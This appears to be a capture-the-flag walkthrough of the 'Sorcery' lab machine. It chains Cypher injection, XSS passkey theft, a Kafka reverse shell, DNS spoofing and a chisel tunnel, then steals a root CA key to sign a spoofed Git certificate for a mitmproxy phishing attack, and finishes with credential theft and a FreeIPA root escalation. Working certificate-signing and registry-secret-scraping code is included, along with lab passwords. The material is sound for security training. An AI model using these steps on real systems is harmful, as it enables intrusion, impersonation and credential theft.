Step 1: Nmap Scan
Run nmap (default scripts, version detection, verbose, output saved under nmap/):
nmap -T4 -vv -sC -sV -oN nmap/intial 10.129.161.83
Discovered open ports:
22/tcp -> SSH (OpenSSH 9.6p1)
443/tcp -> HTTPS (nginx/1.27.1)
Step 2: Web Enumeration
Access main website:
https://sorcery.htb/auth/login
Discover Git server:
https://git.sorcery.htb
Clone repository (GIT_SSL_NO_VERIFY is needed because the Git server presents a certificate the attacking machine does not trust):
GIT_SSL_NO_VERIFY=true git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git

Step 3: Register User
Register at:
https://sorcery.htb/auth/register

Step 4: Cypher Injection for Registration Key
Inject a Cypher query to extract the registration key (the trailing %2F%2F decodes to //, the Cypher line comment, which discards the remainder of the server-side query):
https://sorcery.htb/dashboard/store/88b6b6c5...%2F%2F
Found registration key:
dd05d743-b560-45dc-9a09-43ab18c7a513
Register as seller using this key.

Step 5: XSS to Extract Admin Passkey
Access:
https://sorcery.htb/dashboard/new-product
Trigger XSS to extract the admin credentials (the passkey used in Step 7).

Step 6: Cypher Injection to Reset Admin Password
Inject payload (same injection point as Step 4, again terminated with %2F%2F):
https://sorcery.htb/dashboard/store/...%2F%2F
Admin password set to:
haxforums

Step 7: Login with Passkey
Use the WebDevAuthn browser extension to present the extracted passkey and log in as admin.

Step 8: Kafka Exploitation
Set up Kafka via docker-compose.
Extract the topic name from main.rs: update
Send the reverse-shell payload via Kafka:
python3 exploit_kafka.py
Monitor traffic in Wireshark (Loopback interface) to confirm the message is produced and the callback arrives.
Step 9: DNS Spoofing
Modify /dns/hosts-user so that pain.sorcery.htb resolves to the attacker host, regenerate the dnsmasq configuration with convert.sh, then kill dnsmasq so the regenerated hosts file is loaded when it comes back up:
echo '10.10.15.11 pain.sorcery.htb' >> /dns/hosts-user
./convert.sh
pkill -9 dnsmasq

Step 10: Chisel Tunnel for Proxy
Serve chisel binary:
python3 -m http.server 80
Start client (on the host that reaches the internal 172.19.0.0/16 network; R:socks asks the server to open a SOCKS listener on the attacker side):
./chisel client 10.10.15.11:5555 R:socks
Start server (on the attacker at 10.10.15.11; it must be listening before the client connects, and --reverse is required for the R:socks remote):
./chisel_arm server --port 5555 --reverse --socks5

Step 11: Download RootCA and Sign Certificate
Through proxychains (over the chisel SOCKS tunnel), download the root CA private key and certificate from the internal FTP server:
curl ftp://172.19.0.2/pub/RootCA.key
curl ftp://172.19.0.2/pub/RootCA.crt
With the CA private key in hand, sign a certificate for git.sorcery.htb that every host trusting this root CA will accept (the signing commands are elided on the page), then start mitmproxy in reverse mode in front of the real Git server:
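The mechanics of that signing step, as an added example rather than the page's own commands: the script below mints a leaf certificate for git.sorcery.htb that chains to a root CA, verifies the chain and hostname the way a client would, and bundles key plus certificate into the single PEM that mitmproxy's --certs option takes. make_stand_in_ca() generates a throwaway CA so the script runs offline; with the real RootCA.key and RootCA.crt from the FTP server you would skip it and point sign_leaf() at those two files. All file names are assumptions.

```shell
# Added example (not from the page): sign a TLS certificate for git.sorcery.htb
# with a CA key and check that it verifies, as a client trusting that CA would.
set -e

make_stand_in_ca() {            # $1 = working dir; throwaway CA standing in for RootCA.key/.crt
    openssl req -new -newkey rsa:2048 -nodes -sha256 \
        -keyout "$1/RootCA.key" -out "$1/ca.csr" -subj "/CN=Stand-in Root CA" >/dev/null 2>&1
    printf 'basicConstraints=critical,CA:TRUE\nkeyUsage=critical,keyCertSign,cRLSign\nsubjectKeyIdentifier=hash\n' > "$1/ca.ext"
    openssl x509 -req -in "$1/ca.csr" -signkey "$1/RootCA.key" -days 30 -sha256 \
        -extfile "$1/ca.ext" -out "$1/RootCA.crt" >/dev/null 2>&1
}

sign_leaf() {                   # $1 = working dir holding RootCA.key/RootCA.crt, $2 = hostname
    openssl req -new -newkey rsa:2048 -nodes -sha256 \
        -keyout "$1/leaf.key" -out "$1/leaf.csr" -subj "/CN=$2" >/dev/null 2>&1
    # Clients match the SAN, not the CN; serverAuth EKU is what a TLS server needs.
    printf 'subjectAltName=DNS:%s\nbasicConstraints=CA:FALSE\nkeyUsage=digitalSignature,keyEncipherment\nextendedKeyUsage=serverAuth\n' "$2" > "$1/leaf.ext"
    openssl x509 -req -in "$1/leaf.csr" -CA "$1/RootCA.crt" -CAkey "$1/RootCA.key" \
        -CAcreateserial -days 30 -sha256 -extfile "$1/leaf.ext" -out "$1/leaf.crt" >/dev/null 2>&1
    # mitmproxy --certs takes private key and certificate in one PEM file
    cat "$1/leaf.key" "$1/leaf.crt" > "$1/leaf.pem"
}

verify_leaf() {                 # $1 = working dir, $2 = hostname; exit 0 only if chain and hostname check out
    openssl verify -CAfile "$1/RootCA.crt" -verify_hostname "$2" "$1/leaf.crt" >/dev/null 2>&1
}

WORK=$(mktemp -d)
make_stand_in_ca "$WORK"
sign_leaf "$WORK" git.sorcery.htb
verify_leaf "$WORK" git.sorcery.htb && echo "leaf.crt for git.sorcery.htb verifies against RootCA.crt"
```

The point of the exercise is the verify step: because the leaf chains to the CA the victim's hosts already trust, the mitmproxy in front of git.sorcery.htb raises no certificate warning, which is what makes the phishing in the next step credible.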
mitmproxy --mode reverse:https://git.sorcery.htb ...

Step 12: Phishing via Mail
Send a phishing mail to tom_summers:
swaks --to [email protected] --data "..."
Retrieve the credentials submitted through the proxied login:
tom_summers : jNsMKQ6k2.XDMPu.

Step 13: Extract Screenshot & OCR
Fetch the Xvfb framebuffer dump, convert the XWD image to PNG and run OCR over it:
wget http://10.10.11.71:2004/Xvfb_screen0
mv Xvfb_screen0 text.xwd
convert text.xwd text.png
tesseract text.png output
cat output.txt
Found creds:
tom_summers_admin : dWpuk7cesBjT-

Step 14: Privilege Escalation with Strace
Run trace.sh to monitor the docker login process with strace; the credentials passing through its syscalls are captured.
Trigger docker login (permitted via sudo as rebecca_smith):
sudo -u rebecca_smith /usr/bin/docker login
Extracted creds:
rebecca_smith : -7eAZDp9-f9mg

Step 15: Use Proxy to Extract Docker Blob
Use proxychains (over the chisel tunnel from Step 10) to authenticate to the internal registry on 127.0.0.1:5000 and pull the blob:
curl -u 'rebecca_smith:...' http://127.0.0.1:5000/...
Found creds:
donna_adams : 3FEVPCT_c3xDH
ash_winter : w@LoiU8Crmdep

Step 16: Root Privileges
SSH in as ash_winter.
Grant ash_winter sudo through FreeIPA (sysadmins group membership plus the existing allow_sudo rule), then restart sssd so the cached sudo rules are refreshed:
ipa group-add-member sysadmins --users=ash_winter
ipa sudorule-add-user allow_sudo --users=ash_winter
sudo /usr/bin/systemctl restart sssd
Become root:
sudo su
cat /root/root.txt
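Back to Step 15, which pulls an image blob from the registry on 127.0.0.1:5000 through the tunnel and reads credentials out of it. The following is an added example, not the page's commands: assuming that service is a Docker Registry v2 (the default port suggests it; the page does not say), it lists the layer digests from a manifest, builds the blob paths curl would request with basic auth, and searches an extracted layer for credential-looking lines. The manifest and layer are constructed in memory so the script runs offline; the registry URL, repository name and secret regex are assumptions.

```python
import base64
import io
import json
import re
import tarfile
from urllib.request import Request, urlopen

# Assumed: the page only shows curl against 127.0.0.1:5000, the default Registry v2 port.
REGISTRY = "http://127.0.0.1:5000"
MANIFEST_V2 = "application/vnd.docker.distribution.manifest.v2+json"


def registry_get(path, user, password, accept=None):
    """GET a registry path with HTTP basic auth (run under proxychains so it rides the chisel tunnel).
    Not called in the offline demo below."""
    req = Request(REGISTRY + path)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    if accept:
        req.add_header("Accept", accept)
    with urlopen(req, timeout=30) as resp:
        return resp.read()


def layer_digests(manifest_json):
    """Return the content-addressed layer digests listed in a v2 image manifest."""
    manifest = json.loads(manifest_json)
    return [layer["digest"] for layer in manifest.get("layers", [])]


def blob_path(repo, digest):
    """Registry v2 path for pulling one blob (layer or config) by digest."""
    return f"/v2/{repo}/blobs/{digest}"


# Loose credential pattern: key=value or key: value lines whose key looks like a secret (assumption).
SECRET_RE = re.compile(r"(?i)(password|passwd|secret|token|api_key)\s*[:=]\s*\S+")


def find_secrets_in_layer(layer_bytes):
    """Walk a gzipped tar layer blob and return (member path, matching line) for every hit."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            handle = tar.extractfile(member)
            if handle is None:
                continue
            text = handle.read().decode("utf-8", errors="ignore")
            for line in text.splitlines():
                if SECRET_RE.search(line):
                    hits.append((member.name, line.strip()))
    return hits


def _constructed_layer(files):
    """Build an in-memory gzipped tar layer from {path: bytes}; constructed sample data only."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample manifest and layer; not data from the target.
SAMPLE_LAYER = _constructed_layer({
    "app/.env": b"DB_USER=svc_app\nDB_PASSWORD=example-not-real\nPORT=8080\n",
    "etc/motd": b"internal registry test image\n",
})
SAMPLE_MANIFEST = json.dumps({
    "schemaVersion": 2,
    "mediaType": MANIFEST_V2,
    "config": {"digest": "sha256:" + "c" * 64},
    "layers": [{"digest": "sha256:" + "a" * 64}, {"digest": "sha256:" + "b" * 64}],
}).encode()


if __name__ == "__main__":
    for digest in layer_digests(SAMPLE_MANIFEST):
        print("would fetch", blob_path("infrastructure/app", digest))
    for name, line in find_secrets_in_layer(SAMPLE_LAYER):
        print(f"{name}: {line}")
```

Against a live registry the flow is: registry_get("/v2/<repo>/manifests/<tag>", ..., accept=MANIFEST_V2), then registry_get(blob_path(repo, digest), ...) for each digest, and find_secrets_in_layer() on every returned blob; the same basic-auth header is what the page's curl -u sends.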